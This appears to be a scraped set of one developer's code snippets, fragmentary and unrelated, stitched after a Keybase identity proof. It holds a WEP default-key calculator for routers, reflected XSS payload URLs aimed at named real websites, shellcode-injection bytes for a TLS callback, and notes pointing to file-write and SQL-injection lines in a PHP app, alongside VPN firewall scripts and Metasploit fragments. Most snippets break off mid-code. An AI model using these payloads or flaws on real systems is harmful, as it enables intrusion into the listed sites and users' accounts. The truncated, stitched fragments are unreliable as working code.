I hereby claim:
- I am gerry on github.
- I am gerry (https://keybase.io/gerry) on keybase.
- I have a public key whose fingerprint is F120 587B A599 B6B6 1ED6 1A37 DD61 36D6 59E5 4DEF
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
#!/usr/bin/env python | |
import sys | |
import random | |
import string | |
import datetime | |
import itertools | |
import threading | |
import traceback | |
import SocketServer | |
import operator as op |
# Calculate the lower 6 bytes of the WEP key, the upper 4 are from the MAC | |
# address of the router (1801 or 1F90) | |
def get_key(essid): | |
key = sum(int(val, 36) * (36**idx) for idx, val in enumerate(essid)) | |
return hex(key) | |
# >>> print get_key("E3X12") | |
# 0x349fca |
https://hackalert.armorize.com/givepassword.php/%22%3E%3Cscript%3Ealert('oops')%3C/script%3E | |
http://data.mint.com/search?q=%22)})}alert('pwned');{({/*&offset=0&max=30&numpages=4 | |
https://biz.yelp.com/signup/dAecu6T1DJiDrAVZ-uIVtw/?return_url=%22%3E%3C/a%3E%3Cscript%3Ealert(1)%3C/script%3E | |
https://support.steampowered.com/register.php?password2=%22/style=%22position:fixed;top:0px;left:0px;height:100%;width:100%%22/onmouseover=%22alert%28/XSS/%29 | |
https://idp.godaddy.com/Error.aspx?SPKey=%22;alert%281%29;// | |
http://sandboxbeta.sunbeltsoftware.com/loginlocked.aspx?FTVAR_REDIRECTURLFRM=%22%20STYLE%3d%22width:%20expression(window.x?0:(alert(/XSS/),window.x%3d1));%22 | |
http://www.webroot.com/En_US/search-results.html?q=');alert('gerry | |
http://www.mcafee.com/apps/search/threat.aspx?q=';alert(1);//&v=malware | |
http://products.verizonwireless.com/index.aspx?';alert(1)// |
# Drop this into msf3 root-dir as 'msf-rex.gemspec'. | |
# | |
# Create gem with: | |
# $ gem build msf-rex.gemspec | |
# | |
# Note there's already a "rex" rubygem, which is why we used 'msf-rex'. | |
# We can still "require 'rex'" though. | |
$: << 'lib' |
diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb | |
index 7e0bc73..9b5c8d8 100644 | |
--- a/lib/msf/core/db.rb | |
+++ b/lib/msf/core/db.rb | |
@@ -5163,11 +5163,11 @@ class DBManager | |
# There is no place the NBE actually stores the plugin name used to | |
# scan. You get "Security Note" or "Security Warning," and that's it. | |
def import_nessus_nbe(args={}, &block) | |
- data = args[:data] | |
+ nbe_data = args[:data] |
#!/bin/sh -e | |
HOSTNAME=us-california.privateinternetaccess.com | |
# host us-california.privateinternetaccess.com|cut -d' ' -f4|tr \\n , | |
HOST_IPS=198.8.80.220,198.8.80.223,198.8.80.33,198.8.80.149,198.8.80.180,198.8.80.221,198.8.80.50,198.8.80.203,198.8.80.162,198.8.80.176,107.152.98.168,198.8.80.222,107.152.98.159 | |
IP=$(echo $HOST_IPS | tr , \\n | shuf - | head -n 1) | |
if grep -q $HOSTNAME /etc/hosts; then | |
sed -i "s/.*$HOSTNAME/$IP $HOSTNAME/" /etc/hosts | |
else | |
echo $IP $HOSTNAME >> /etc/hosts |
#!/bin/sh -e | |
DEFAULT_IFACE=enp0s3 | |
LOCAL_NET=$(ip -o -f inet addr show $DEFAULT_IFACE | awk '{print $4}') | |
HOST_IPS=198.8.80.220,198.8.80.223,198.8.80.33,198.8.80.149,198.8.80.180,198.8.80.221,198.8.80.50,198.8.80.203,198.8.80.162,198.8.80.176,107.152.98.168,198.8.80.222,107.152.98.159 | |
ufw --force reset | |
ufw default deny outgoing | |
ufw default deny incoming | |
ufw allow out on tun0 from any to any | |
ufw allow in on tun0 from any to any |
offset = 0x1000 - len(scode) - 32 | |
tls_header = "\xE8\x00\x00\x00\x00" # CALL $+5 | |
tls_header += "\x5E" # POP ESI | |
tls_header += "\x83\xC6\x1B" # ADD ESI, 0x1b | |
tls_header += "\xB9" + struct.pack("<L", len(scode)) # MOV ECX, len(scode) | |
tls_header += "\x64\x8B\x3D\x30\x00\x00\x00" # MOV EDI,DWORD PTR FS:[30] | |
tls_header += "\x81\xC7" + struct.pack("<L", offset) # ADD EDI, offset | |
tls_header += "\x57" # PUSH EDI | |
tls_header += "\xFC" # CLD | |
tls_header += "\xF3\xA4" # REP MOVSB [EDI], [ESI] |
./sources/export.queries.php:471: $outstream = fopen($_POST['file'], "a");
(place php in item description)
./sources/admin.queries.php:1110: $fh = fopen($tmp_skfile, 'w');
(admin required)
./sources/views.queries.php:437: ORDER BY ".$_POST['order']." ".$_POST['direction']."
(admin required)
./sources/downloadFile.php:47: $fp = fopen($_SESSION['settings']['path_to_upload_folder'].'/'.$result['file'], 'rb');